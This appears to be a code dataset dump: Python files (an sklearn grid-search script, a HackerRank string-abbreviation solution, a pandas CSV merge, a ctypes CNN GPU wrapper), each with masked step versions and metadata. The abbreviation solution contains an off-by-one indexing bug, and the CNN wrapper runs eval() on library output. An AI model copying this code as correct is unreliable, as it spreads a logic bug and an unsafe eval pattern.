"step-4": "from os import path\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.pipeline import Pipeline\nfrom sta211.datasets import load_train_dataset, load_test_dataset, find_best_train_dataset\nfrom sklearn.model_selection import GridSearchCV\nfrom sta211.selection import get_naive_bayes, get_mlp, get_svm, get_gradient_boosting, get_random_forest, get_best_hyper_parameters, get_extra_trees, get_adaboost, get_voting_classifier\nfrom multiprocessing import cpu_count\nn_jobs = max(1, cpu_count() - 1)\ntest_size = 0.2\nX, y, quantitatives = load_train_dataset()\npipe, search_grid = get_voting_classifier()\ncv = StratifiedShuffleSplit(test_size=test_size, random_state=0, n_splits=5)\ngrid = GridSearchCV(pipe, search_grid, cv=cv, n_jobs=n_jobs,\n return_train_score=True, refit=True, scoring='accuracy')\ngrid.fit(X, y)\nparameters = get_best_hyper_parameters(grid)\nprint('Result for {} configurations'.format(len(parameters)))\nfor p in parameters:\n print('{};{:.2f}%;{:.4f}%;±{:.4f}%'.format(', '.join(map(lambda k:\n '{}={}'.format(k.split('__')[1], p['params'][k]), p['params'].keys(\n ))), 100.0 * p['mean_train_score'], 100.0 * p['mean_test_score'], \n 200.0 * p['std_test_score']))\nprediction_file = '{}/predictions.csv'.format(path.dirname(path.abspath(\n __file__)))\npred = grid.predict(load_test_dataset())\nf = open(prediction_file, 'w')\nf.write('\\n'.join(map(lambda o: str(o), pred)))\nf.close()\n",
"step-5": "from os import path\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.pipeline import Pipeline\nfrom sta211.datasets import load_train_dataset, load_test_dataset, find_best_train_dataset\nfrom sklearn.model_selection import GridSearchCV\nfrom sta211.selection import get_naive_bayes, get_mlp, get_svm, get_gradient_boosting, get_random_forest, get_best_hyper_parameters, get_extra_trees, get_adaboost, get_voting_classifier\nfrom multiprocessing import cpu_count\n\n\nn_jobs = max(1, cpu_count()-1)\ntest_size = 0.20\n\nX, y, quantitatives = load_train_dataset()\n\n# Manual aggregation\npipe, search_grid = get_voting_classifier()\n\n# pipes, search_grid = get_svm()\n# pipe = Pipeline(pipes)\n\ncv = StratifiedShuffleSplit(test_size=test_size, random_state=0, n_splits=5)\ngrid = GridSearchCV(pipe, search_grid, cv=cv, n_jobs=n_jobs, return_train_score=True, refit=True, scoring=\"accuracy\")\ngrid.fit(X, y)\n\nparameters = get_best_hyper_parameters(grid)\nprint(\"Result for {} configurations\".format(len(parameters)))\nfor p in parameters:\n print(\"{};{:.2f}%;{:.4f}%;±{:.4f}%\".format(\n \", \".join(map(lambda k: \"{}={}\".format(k.split(\"__\")[1], p[\"params\"][k]), p[\"params\"].keys())),\n 100.0 * p[\"mean_train_score\"],\n 100.0 * p[\"mean_test_score\"],\n 200.0 * p[\"std_test_score\"]\n ))\n\n # print(\"Results: Train: {:.2f}%, Test: {:.2f}% std:{:.4f} for {}\".format(100 * p[\"mean_train_score\"], 100 * p[\"mean_test_score\"], p[\"std_test_score\"], p[\"params\"]))\n\nprediction_file = \"{}/predictions.csv\".format(path.dirname(path.abspath(__file__)))\npred = grid.predict(load_test_dataset())\nf = open(prediction_file, \"w\")\nf.write(\"\\n\".join(map(lambda o: str(o), pred)))\nf.close()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
You can perform the following operations on the string, :
Capitalize zero or more of 's lowercase letters.
Delete all of the remaining lowercase letters in .
Given two strings, and , determine if it's possible to make equal to as described. If so, print YES on a new line. Otherwise, print NO.
For example, given and , in we can convert and delete to match . If and , matching is not possible because letters may only be capitalized or discarded, not changed.
Function Description
Complete the function in the editor below. It must return either or .
abbreviation has the following parameter(s):
a: the string to modify
b: the string to match
Input Format
The first line contains a single integer , the number of queries.
Each of the next pairs of lines is as follows:
- The first line of each query contains a single string, .
- The second line of each query contains a single string, .
Constraints
String consists only of uppercase and lowercase English letters, ascii[A-Za-z].
String consists only of uppercase English letters, ascii[A-Z].
Output Format
For each query, print YES on a new line if it's possible to make string equal to string . Otherwise, print NO.
Sample Input
1
daBcd
ABC
Sample Output
YES
Explanation
image
We have daBcd and ABC. We perform the following operation:
Capitalize the letters a and c in so that dABCd.
Delete all the remaining lowercase letters in so that ABC.
Because we were able to successfully convert to , we print YES on a new line.
"""
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the abbreviation function below.
def abbreviation(a, b):
m, n = len(a), len(b)
dp = [[False]*(m+1) for _ in range(n+1)]
dp[0][0] = True
for i in range(n+1):
for j in range(1,m+1):
if a[j-1] == b[i-1]:
dp[i][j] = dp[i-1][j-1]
elif a[j-1].upper() == b[i-1]:
dp[i][j] = dp[i-1][j-1] or dp[i][j-1]
elif a[j-1].islower():
dp[i][j] = dp[i][j-1]
return "YES" if dp[n][m] else "NO"
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
q = int(input())
for q_itr in range(q):
a = input()
b = input()
result = abbreviation(a, b)
fptr.write(result + '\n')
fptr.close()
|
normal
|
{
"blob_id": "5fb998fa761b989c6dd423634824197bade4f8a5",
"index": 23,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [([False] * (m + 1)) for _ in range(n + 1)]\n dp[0][0] = True\n for i in range(n + 1):\n for j in range(1, m + 1):\n if a[j - 1] == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n elif a[j - 1].upper() == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]\n elif a[j - 1].islower():\n dp[i][j] = dp[i][j - 1]\n return 'YES' if dp[n][m] else 'NO'\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [([False] * (m + 1)) for _ in range(n + 1)]\n dp[0][0] = True\n for i in range(n + 1):\n for j in range(1, m + 1):\n if a[j - 1] == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n elif a[j - 1].upper() == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]\n elif a[j - 1].islower():\n dp[i][j] = dp[i][j - 1]\n return 'YES' if dp[n][m] else 'NO'\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n q = int(input())\n for q_itr in range(q):\n a = input()\n b = input()\n result = abbreviation(a, b)\n fptr.write(result + '\\n')\n fptr.close()\n",
"step-4": "<mask token>\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [([False] * (m + 1)) for _ in range(n + 1)]\n dp[0][0] = True\n for i in range(n + 1):\n for j in range(1, m + 1):\n if a[j - 1] == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n elif a[j - 1].upper() == b[i - 1]:\n dp[i][j] = dp[i - 1][j - 1] or dp[i][j - 1]\n elif a[j - 1].islower():\n dp[i][j] = dp[i][j - 1]\n return 'YES' if dp[n][m] else 'NO'\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n q = int(input())\n for q_itr in range(q):\n a = input()\n b = input()\n result = abbreviation(a, b)\n fptr.write(result + '\\n')\n fptr.close()\n",
"step-5": "\"\"\"\nYou can perform the following operations on the string, :\n\nCapitalize zero or more of 's lowercase letters.\nDelete all of the remaining lowercase letters in .\nGiven two strings, and , determine if it's possible to make equal to as described. If so, print YES on a new line. Otherwise, print NO.\n\nFor example, given and , in we can convert and delete to match . If and , matching is not possible because letters may only be capitalized or discarded, not changed.\n\nFunction Description\n\nComplete the function in the editor below. It must return either or .\n\nabbreviation has the following parameter(s):\n\na: the string to modify\nb: the string to match\nInput Format\n\nThe first line contains a single integer , the number of queries.\n\nEach of the next pairs of lines is as follows:\n- The first line of each query contains a single string, .\n- The second line of each query contains a single string, .\n\nConstraints\n\nString consists only of uppercase and lowercase English letters, ascii[A-Za-z].\nString consists only of uppercase English letters, ascii[A-Z].\nOutput Format\n\nFor each query, print YES on a new line if it's possible to make string equal to string . Otherwise, print NO.\n\nSample Input\n\n1\ndaBcd\nABC\nSample Output\n\nYES\nExplanation\n\nimage\n\nWe have daBcd and ABC. We perform the following operation:\n\nCapitalize the letters a and c in so that dABCd.\nDelete all the remaining lowercase letters in so that ABC.\nBecause we were able to successfully convert to , we print YES on a new line.\n\n\n\"\"\"\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# Complete the abbreviation function below.\ndef abbreviation(a, b):\n m, n = len(a), len(b)\n dp = [[False]*(m+1) for _ in range(n+1)]\n dp[0][0] = True\n for i in range(n+1):\n for j in range(1,m+1):\n if a[j-1] == b[i-1]:\n dp[i][j] = dp[i-1][j-1]\n elif a[j-1].upper() == b[i-1]:\n dp[i][j] = dp[i-1][j-1] or dp[i][j-1]\n elif a[j-1].islower():\n dp[i][j] = dp[i][j-1]\n return \"YES\" if dp[n][m] else \"NO\"\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n q = int(input())\n\n for q_itr in range(q):\n a = input()\n\n b = input()\n\n result = abbreviation(a, b)\n\n fptr.write(result + '\\n')\n\n fptr.close()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import pandas as pd
df1 = pd.read_csv("../final/your_no.tsv", '\t')
df2 = pd.read_csv("../../Downloads/me.csv", '\t')
final = pd.concat([df1, df2])
final.to_csv('../../Downloads/final_con_final.tsv', sep='\t', index=False)
|
normal
|
{
"blob_id": "cd5945631a9dd505bf67089bab8c5a37ad375129",
"index": 410,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfinal.to_csv('../../Downloads/final_con_final.tsv', sep='\\t', index=False)\n",
"step-3": "<mask token>\ndf1 = pd.read_csv('../final/your_no.tsv', '\\t')\ndf2 = pd.read_csv('../../Downloads/me.csv', '\\t')\nfinal = pd.concat([df1, df2])\nfinal.to_csv('../../Downloads/final_con_final.tsv', sep='\\t', index=False)\n",
"step-4": "import pandas as pd\ndf1 = pd.read_csv('../final/your_no.tsv', '\\t')\ndf2 = pd.read_csv('../../Downloads/me.csv', '\\t')\nfinal = pd.concat([df1, df2])\nfinal.to_csv('../../Downloads/final_con_final.tsv', sep='\\t', index=False)\n",
"step-5": "import pandas as pd \ndf1 = pd.read_csv(\"../final/your_no.tsv\", '\\t')\ndf2 = pd.read_csv(\"../../Downloads/me.csv\", '\\t')\nfinal = pd.concat([df1, df2])\nfinal.to_csv('../../Downloads/final_con_final.tsv', sep='\\t', index=False)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import time,pickle
from CNN_GPU.CNN_C_Wrapper import *
from pathlib import Path
FSIGMOIG = 0
FTANH = 2
FRELU = 4
REQUEST_INPUT = 0
REQUEST_GRAD_INPUT = 1
REQUEST_OUTPUT = 2
REQUEST_WEIGTH = 3
class CNN:
def __init__(self, inputSize, hitLearn=.1, momentum=.9, weigthDecay=.5, multip=1.0):
file = '%s/%s' % (DIR_LIBRARY, 'gpu_function.cl')
file = file.encode('utf-8')
self.cnn = c_Pointer()
clib.createCnnWrapper(c.addressof(self.cnn), c.create_string_buffer(file),
hitLearn, momentum, weigthDecay, multip, inputSize[0], inputSize[1], inputSize[2])
clib.initRandom(time.time_ns())
def __del__(self):
clib.releaseCnnWrapper(c.addressof(self.cnn))
print('end')
def addConvLayer(self, passo, tamanhoFitro, numeroFiltro):
clib.CnnAddConvLayer(self.cnn.p, passo, tamanhoFitro, numeroFiltro)
def addPoolLayer(self, passo, tamanhoFitro):
clib.CnnAddPoolLayer(self.cnn.p, passo, tamanhoFitro)
def addReluLayer(self):
clib.CnnAddReluLayer(self.cnn.p)
def addDropOutLayer(self, pontoAtivacao, seed):
clib.CnnAddDropOutLayer(self.cnn.p, pontoAtivacao, seed)
def addFullConnectLayer(self, saida, funcaoAtivacao):
clib.CnnAddFullConnectLayer(self.cnn.p, saida, funcaoAtivacao)
def predict(self, input):
tinput = self.createInp(*input)
clib.CnnCall(self.cnn.p, tinput)
def learn(self, target):
ttarg = self.targ(*target)
clib.CnnLearn(self.cnn.p, ttarg)
def getData(self, layer, request, nfilter=0):
size = self.getSizeData(layer, request)
if size is None: return None
data = c.c_double * (size[0] * size[1] * size[2])
data = data(0)
err = clib.CnnGetTensorData(self.cnn.p, layer, request, nfilter, data)
if err < 0:
self.lastERROR = err
return None
return list(data)
def getSizeData(self, layer, request):
inx, iny, inz, n = c.c_int(0), c.c_int(0), c.c_int(0), c.c_int(0)
err = clib.CnnGetSize(self.cnn.p, layer, request, c.addressof(inx), c.addressof(iny), c.addressof(inz),
c.addressof(n))
if err < 0:
self.lastERROR = err
return None
return inx.value, iny.value, inz.value, n.value
@property
def output(self):
err = clib.CnnGetTensorData(self.cnn.p, -1, REQUEST_OUTPUT, 0, self.out)
if err < 0:
self.lastERROR = err
return None
return list(self.out)
def compile(self):
if self.error: raise Exception("ERROR")
inx, iny, inz = c.c_int(0), c.c_int(0), c.c_int(0)
err = clib.CnnGetSize(self.cnn.p, 0, REQUEST_INPUT, c.addressof(inx), c.addressof(iny), c.addressof(inz),
c.cast(0, c.c_void_p))
if err != 0: raise Exception('Error when request input size', err)
self.createInp = c.c_double * (inx.value * iny.value * inz.value)
err = clib.CnnGetSize(self.cnn.p, -1, REQUEST_OUTPUT, c.addressof(inx), c.addressof(iny), c.addressof(inz),
c.cast(0, c.c_void_p))
if err != 0: raise Exception('Error when request output size', err)
self.out = c.c_double * (inx.value * iny.value * inz.value)
self.targ = self.out
self.out = self.out(0)
def info(self):
clib.CnnInfo(self.cnn.p)
def save(self, fileName:str):
filedesc = Path(fileName).with_suffix('.cdc')
self.salveCnnDescriptor(filedesc)
fileName = fileName.encode('utf-8')
return clib.CnnSaveInFile(self.cnn.p, c.create_string_buffer(fileName))
@staticmethod
def load(fileName):
self = CNN([2,2,1])
fileName = fileName.encode('utf-8')
clib.CnnLoadByFile(self.cnn.p, c.create_string_buffer(fileName))
self.compile()
return self
@property
def error(self):
return clib.getCnnError(self.cnn.p)
@property
def errorMsg(self):
buff = c.create_string_buffer(''.encode('utf-8'),255)
clib.getCnnErrormsg(self.cnn.p,buff)
return buff.value.decode('utf-8')
def salveCnnDescriptor(self,file):
desc_c = c_Pointer()
clib.generateDescriptor(c.addressof(desc_c),self.cnn.p)
msg = c.cast(desc_c.p,c.c_char_p)
msg = msg.value.decode('utf-8')
clib.freeP(desc_c.p)
desc = eval(msg)
with open(file,'wb') as f:
pickle.dump(desc,f)
# AUXILIAR FUNCTION
def getOutputAsIndexMax(self):
ans = clib.CnnGetIndexMax(self.cnn.p)
return ans
def normalizeVector(self,vector:list,maxOutput,minOutput):
out_TYPE =c.c_double * len(vector)
inp = out_TYPE(*vector)
out = out_TYPE()
clib.normalizeGPU(self.cnn.p,inp,out,len(vector),maxOutput,minOutput)
return list(out)
def normalizeVectorKnowedSpace(self,vector:list,maxInput,minInput,maxOutput,minOutput):
out_TYPE =c.c_double * len(vector)
tmp_inp = out_TYPE(*vector)
tmp_out = out_TYPE(*vector)
clib.normalizeGPUSpaceKnow(self.cnn.p,tmp_inp,tmp_out,len(vector),maxInput,minInput,maxOutput,minOutput)
return list(tmp_out)
def getOutPutAsPPM(self):
p = c_Pointer()
h = c.c_size_t()
w = c.c_size_t()
clib.Py_getCnnOutPutAsPPM(self.cnn.p, c.addressof(p), c.addressof(h), c.addressof(w))
h = h.value
w = w.value
out = (c.c_ubyte*(w*h))()
c.memmove(out,p.p,w*h)
a = bytes(out)
clib.freeP(p.p)
return (h,w,a)
|
normal
|
{
"blob_id": "32db21ed7f57f29260d70513d8c34de53adf12d7",
"index": 5740,
"step-1": "<mask token>\n\n\nclass CNN:\n\n def __init__(self, inputSize, hitLearn=0.1, momentum=0.9, weigthDecay=\n 0.5, multip=1.0):\n file = '%s/%s' % (DIR_LIBRARY, 'gpu_function.cl')\n file = file.encode('utf-8')\n self.cnn = c_Pointer()\n clib.createCnnWrapper(c.addressof(self.cnn), c.create_string_buffer\n (file), hitLearn, momentum, weigthDecay, multip, inputSize[0],\n inputSize[1], inputSize[2])\n clib.initRandom(time.time_ns())\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def learn(self, target):\n ttarg = self.targ(*target)\n clib.CnnLearn(self.cnn.p, ttarg)\n\n def getData(self, layer, request, nfilter=0):\n size = self.getSizeData(layer, request)\n if size is None:\n return None\n data = c.c_double * (size[0] * size[1] * size[2])\n data = data(0)\n err = clib.CnnGetTensorData(self.cnn.p, layer, request, nfilter, data)\n if err < 0:\n self.lastERROR = err\n return None\n return list(data)\n <mask token>\n <mask token>\n <mask token>\n\n def info(self):\n clib.CnnInfo(self.cnn.p)\n\n def save(self, fileName: str):\n filedesc = Path(fileName).with_suffix('.cdc')\n self.salveCnnDescriptor(filedesc)\n fileName = fileName.encode('utf-8')\n return clib.CnnSaveInFile(self.cnn.p, c.create_string_buffer(fileName))\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def normalizeVectorKnowedSpace(self, vector: list, maxInput, minInput,\n maxOutput, minOutput):\n out_TYPE = c.c_double * len(vector)\n tmp_inp = out_TYPE(*vector)\n tmp_out = out_TYPE(*vector)\n clib.normalizeGPUSpaceKnow(self.cnn.p, tmp_inp, tmp_out, len(vector\n ), maxInput, minInput, maxOutput, minOutput)\n return list(tmp_out)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass CNN:\n\n def __init__(self, inputSize, hitLearn=0.1, momentum=0.9, weigthDecay=\n 0.5, multip=1.0):\n file = '%s/%s' % (DIR_LIBRARY, 'gpu_function.cl')\n file = file.encode('utf-8')\n self.cnn = c_Pointer()\n clib.createCnnWrapper(c.addressof(self.cnn), c.create_string_buffer\n (file), hitLearn, momentum, weigthDecay, multip, inputSize[0],\n inputSize[1], inputSize[2])\n clib.initRandom(time.time_ns())\n <mask token>\n <mask token>\n\n def addPoolLayer(self, passo, tamanhoFitro):\n clib.CnnAddPoolLayer(self.cnn.p, passo, tamanhoFitro)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def learn(self, target):\n ttarg = self.targ(*target)\n clib.CnnLearn(self.cnn.p, ttarg)\n\n def getData(self, layer, request, nfilter=0):\n size = self.getSizeData(layer, request)\n if size is None:\n return None\n data = c.c_double * (size[0] * size[1] * size[2])\n data = data(0)\n err = clib.CnnGetTensorData(self.cnn.p, layer, request, nfilter, data)\n if err < 0:\n self.lastERROR = err\n return None\n return list(data)\n <mask token>\n <mask token>\n <mask token>\n\n def info(self):\n clib.CnnInfo(self.cnn.p)\n\n def save(self, fileName: str):\n filedesc = Path(fileName).with_suffix('.cdc')\n self.salveCnnDescriptor(filedesc)\n fileName = fileName.encode('utf-8')\n return clib.CnnSaveInFile(self.cnn.p, c.create_string_buffer(fileName))\n\n @staticmethod\n def load(fileName):\n self = CNN([2, 2, 1])\n fileName = fileName.encode('utf-8')\n clib.CnnLoadByFile(self.cnn.p, c.create_string_buffer(fileName))\n self.compile()\n return self\n\n @property\n def error(self):\n return clib.getCnnError(self.cnn.p)\n <mask token>\n\n def salveCnnDescriptor(self, file):\n desc_c = c_Pointer()\n clib.generateDescriptor(c.addressof(desc_c), self.cnn.p)\n msg = c.cast(desc_c.p, c.c_char_p)\n msg = msg.value.decode('utf-8')\n clib.freeP(desc_c.p)\n desc = eval(msg)\n with open(file, 'wb') as f:\n pickle.dump(desc, f)\n <mask token>\n <mask token>\n\n def normalizeVectorKnowedSpace(self, vector: list, maxInput, minInput,\n maxOutput, minOutput):\n out_TYPE = c.c_double * len(vector)\n tmp_inp = out_TYPE(*vector)\n tmp_out = out_TYPE(*vector)\n clib.normalizeGPUSpaceKnow(self.cnn.p, tmp_inp, tmp_out, len(vector\n ), maxInput, minInput, maxOutput, minOutput)\n return list(tmp_out)\n\n def getOutPutAsPPM(self):\n p = c_Pointer()\n h = c.c_size_t()\n w = c.c_size_t()\n clib.Py_getCnnOutPutAsPPM(self.cnn.p, c.addressof(p), c.addressof(h\n ), c.addressof(w))\n h = h.value\n w = w.value\n out = (c.c_ubyte * (w * h))()\n c.memmove(out, p.p, w * h)\n a = bytes(out)\n clib.freeP(p.p)\n return h, w, a\n",
"step-3": "<mask token>\n\n\nclass CNN:\n\n def __init__(self, inputSize, hitLearn=0.1, momentum=0.9, weigthDecay=\n 0.5, multip=1.0):\n file = '%s/%s' % (DIR_LIBRARY, 'gpu_function.cl')\n file = file.encode('utf-8')\n self.cnn = c_Pointer()\n clib.createCnnWrapper(c.addressof(self.cnn), c.create_string_buffer\n (file), hitLearn, momentum, weigthDecay, multip, inputSize[0],\n inputSize[1], inputSize[2])\n clib.initRandom(time.time_ns())\n\n def __del__(self):\n clib.releaseCnnWrapper(c.addressof(self.cnn))\n print('end')\n\n def addConvLayer(self, passo, tamanhoFitro, numeroFiltro):\n clib.CnnAddConvLayer(self.cnn.p, passo, tamanhoFitro, numeroFiltro)\n\n def addPoolLayer(self, passo, tamanhoFitro):\n clib.CnnAddPoolLayer(self.cnn.p, passo, tamanhoFitro)\n\n def addReluLayer(self):\n clib.CnnAddReluLayer(self.cnn.p)\n <mask token>\n <mask token>\n <mask token>\n\n def learn(self, target):\n ttarg = self.targ(*target)\n clib.CnnLearn(self.cnn.p, ttarg)\n\n def getData(self, layer, request, nfilter=0):\n size = self.getSizeData(layer, request)\n if size is None:\n return None\n data = c.c_double * (size[0] * size[1] * size[2])\n data = data(0)\n err = clib.CnnGetTensorData(self.cnn.p, layer, request, nfilter, data)\n if err < 0:\n self.lastERROR = err\n return None\n return list(data)\n\n def getSizeData(self, layer, request):\n inx, iny, inz, n = c.c_int(0), c.c_int(0), c.c_int(0), c.c_int(0)\n err = clib.CnnGetSize(self.cnn.p, layer, request, c.addressof(inx),\n c.addressof(iny), c.addressof(inz), c.addressof(n))\n if err < 0:\n self.lastERROR = err\n return None\n return inx.value, iny.value, inz.value, n.value\n\n @property\n def output(self):\n err = clib.CnnGetTensorData(self.cnn.p, -1, REQUEST_OUTPUT, 0, self.out\n )\n if err < 0:\n self.lastERROR = err\n return None\n return list(self.out)\n\n def compile(self):\n if self.error:\n raise Exception('ERROR')\n inx, iny, inz = c.c_int(0), c.c_int(0), c.c_int(0)\n err = clib.CnnGetSize(self.cnn.p, 0, REQUEST_INPUT, c.addressof(inx\n ), c.addressof(iny), c.addressof(inz), c.cast(0, c.c_void_p))\n if err != 0:\n raise Exception('Error when request input size', err)\n self.createInp = c.c_double * (inx.value * iny.value * inz.value)\n err = clib.CnnGetSize(self.cnn.p, -1, REQUEST_OUTPUT, c.addressof(\n inx), c.addressof(iny), c.addressof(inz), c.cast(0, c.c_void_p))\n if err != 0:\n raise Exception('Error when request output size', err)\n self.out = c.c_double * (inx.value * iny.value * inz.value)\n self.targ = self.out\n self.out = self.out(0)\n\n def info(self):\n clib.CnnInfo(self.cnn.p)\n\n def save(self, fileName: str):\n filedesc = Path(fileName).with_suffix('.cdc')\n self.salveCnnDescriptor(filedesc)\n fileName = fileName.encode('utf-8')\n return clib.CnnSaveInFile(self.cnn.p, c.create_string_buffer(fileName))\n\n @staticmethod\n def load(fileName):\n self = CNN([2, 2, 1])\n fileName = fileName.encode('utf-8')\n clib.CnnLoadByFile(self.cnn.p, c.create_string_buffer(fileName))\n self.compile()\n return self\n\n @property\n def error(self):\n return clib.getCnnError(self.cnn.p)\n\n @property\n def errorMsg(self):\n buff = c.create_string_buffer(''.encode('utf-8'), 255)\n clib.getCnnErrormsg(self.cnn.p, buff)\n return buff.value.decode('utf-8')\n\n def salveCnnDescriptor(self, file):\n desc_c = c_Pointer()\n clib.generateDescriptor(c.addressof(desc_c), self.cnn.p)\n msg = c.cast(desc_c.p, c.c_char_p)\n msg = msg.value.decode('utf-8')\n clib.freeP(desc_c.p)\n desc = eval(msg)\n with open(file, 'wb') as f:\n pickle.dump(desc, f)\n\n def getOutputAsIndexMax(self):\n ans = clib.CnnGetIndexMax(self.cnn.p)\n return ans\n <mask token>\n\n def normalizeVectorKnowedSpace(self, vector: list, maxInput, minInput,\n maxOutput, minOutput):\n out_TYPE = c.c_double * len(vector)\n tmp_inp = out_TYPE(*vector)\n tmp_out = out_TYPE(*vector)\n clib.normalizeGPUSpaceKnow(self.cnn.p, tmp_inp, tmp_out, len(vector\n ), maxInput, minInput, maxOutput, minOutput)\n return list(tmp_out)\n\n def getOutPutAsPPM(self):\n p = c_Pointer()\n h = c.c_size_t()\n w = c.c_size_t()\n clib.Py_getCnnOutPutAsPPM(self.cnn.p, c.addressof(p), c.addressof(h\n ), c.addressof(w))\n h = h.value\n w = w.value\n out = (c.c_ubyte * (w * h))()\n c.memmove(out, p.p, w * h)\n a = bytes(out)\n clib.freeP(p.p)\n return h, w, a\n",
"step-4": "<mask token>\n\n\nclass CNN:\n\n def __init__(self, inputSize, hitLearn=0.1, momentum=0.9, weigthDecay=\n 0.5, multip=1.0):\n file = '%s/%s' % (DIR_LIBRARY, 'gpu_function.cl')\n file = file.encode('utf-8')\n self.cnn = c_Pointer()\n clib.createCnnWrapper(c.addressof(self.cnn), c.create_string_buffer\n (file), hitLearn, momentum, weigthDecay, multip, inputSize[0],\n inputSize[1], inputSize[2])\n clib.initRandom(time.time_ns())\n\n def __del__(self):\n clib.releaseCnnWrapper(c.addressof(self.cnn))\n print('end')\n\n def addConvLayer(self, passo, tamanhoFitro, numeroFiltro):\n clib.CnnAddConvLayer(self.cnn.p, passo, tamanhoFitro, numeroFiltro)\n\n def addPoolLayer(self, passo, tamanhoFitro):\n clib.CnnAddPoolLayer(self.cnn.p, passo, tamanhoFitro)\n\n def addReluLayer(self):\n clib.CnnAddReluLayer(self.cnn.p)\n <mask token>\n <mask token>\n\n def predict(self, input):\n tinput = self.createInp(*input)\n clib.CnnCall(self.cnn.p, tinput)\n\n def learn(self, target):\n ttarg = self.targ(*target)\n clib.CnnLearn(self.cnn.p, ttarg)\n\n def getData(self, layer, request, nfilter=0):\n size = self.getSizeData(layer, request)\n if size is None:\n return None\n data = c.c_double * (size[0] * size[1] * size[2])\n data = data(0)\n err = clib.CnnGetTensorData(self.cnn.p, layer, request, nfilter, data)\n if err < 0:\n self.lastERROR = err\n return None\n return list(data)\n\n def getSizeData(self, layer, request):\n inx, iny, inz, n = c.c_int(0), c.c_int(0), c.c_int(0), c.c_int(0)\n err = clib.CnnGetSize(self.cnn.p, layer, request, c.addressof(inx),\n c.addressof(iny), c.addressof(inz), c.addressof(n))\n if err < 0:\n self.lastERROR = err\n return None\n return inx.value, iny.value, inz.value, n.value\n\n @property\n def output(self):\n err = clib.CnnGetTensorData(self.cnn.p, -1, REQUEST_OUTPUT, 0, self.out\n )\n if err < 0:\n self.lastERROR = err\n return None\n return list(self.out)\n\n def compile(self):\n if self.error:\n raise Exception('ERROR')\n inx, iny, inz = c.c_int(0), c.c_int(0), c.c_int(0)\n err = clib.CnnGetSize(self.cnn.p, 0, REQUEST_INPUT, c.addressof(inx\n ), c.addressof(iny), c.addressof(inz), c.cast(0, c.c_void_p))\n if err != 0:\n raise Exception('Error when request input size', err)\n self.createInp = c.c_double * (inx.value * iny.value * inz.value)\n err = clib.CnnGetSize(self.cnn.p, -1, REQUEST_OUTPUT, c.addressof(\n inx), c.addressof(iny), c.addressof(inz), c.cast(0, c.c_void_p))\n if err != 0:\n raise Exception('Error when request output size', err)\n self.out = c.c_double * (inx.value * iny.value * inz.value)\n self.targ = self.out\n self.out = self.out(0)\n\n def info(self):\n clib.CnnInfo(self.cnn.p)\n\n def save(self, fileName: str):\n filedesc = Path(fileName).with_suffix('.cdc')\n self.salveCnnDescriptor(filedesc)\n fileName = fileName.encode('utf-8')\n return clib.CnnSaveInFile(self.cnn.p, c.create_string_buffer(fileName))\n\n @staticmethod\n def load(fileName):\n self = CNN([2, 2, 1])\n fileName = fileName.encode('utf-8')\n clib.CnnLoadByFile(self.cnn.p, c.create_string_buffer(fileName))\n self.compile()\n return self\n\n @property\n def error(self):\n return clib.getCnnError(self.cnn.p)\n\n @property\n def errorMsg(self):\n buff = c.create_string_buffer(''.encode('utf-8'), 255)\n clib.getCnnErrormsg(self.cnn.p, buff)\n return buff.value.decode('utf-8')\n\n def salveCnnDescriptor(self, file):\n desc_c = c_Pointer()\n clib.generateDescriptor(c.addressof(desc_c), self.cnn.p)\n msg = c.cast(desc_c.p, c.c_char_p)\n msg = msg.value.decode('utf-8')\n clib.freeP(desc_c.p)\n desc = eval(msg)\n with open(file, 'wb') as f:\n pickle.dump(desc, f)\n\n def getOutputAsIndexMax(self):\n ans = clib.CnnGetIndexMax(self.cnn.p)\n return ans\n <mask token>\n\n def normalizeVectorKnowedSpace(self, vector: list, maxInput, minInput,\n maxOutput, minOutput):\n out_TYPE = c.c_double * len(vector)\n tmp_inp = out_TYPE(*vector)\n tmp_out = out_TYPE(*vector)\n clib.normalizeGPUSpaceKnow(self.cnn.p, tmp_inp, tmp_out, len(vector\n ), maxInput, minInput, maxOutput, minOutput)\n return list(tmp_out)\n\n def getOutPutAsPPM(self):\n p = c_Pointer()\n h = c.c_size_t()\n w = c.c_size_t()\n clib.Py_getCnnOutPutAsPPM(self.cnn.p, c.addressof(p), c.addressof(h\n ), c.addressof(w))\n h = h.value\n w = w.value\n out = (c.c_ubyte * (w * h))()\n c.memmove(out, p.p, w * h)\n a = bytes(out)\n clib.freeP(p.p)\n return h, w, a\n",
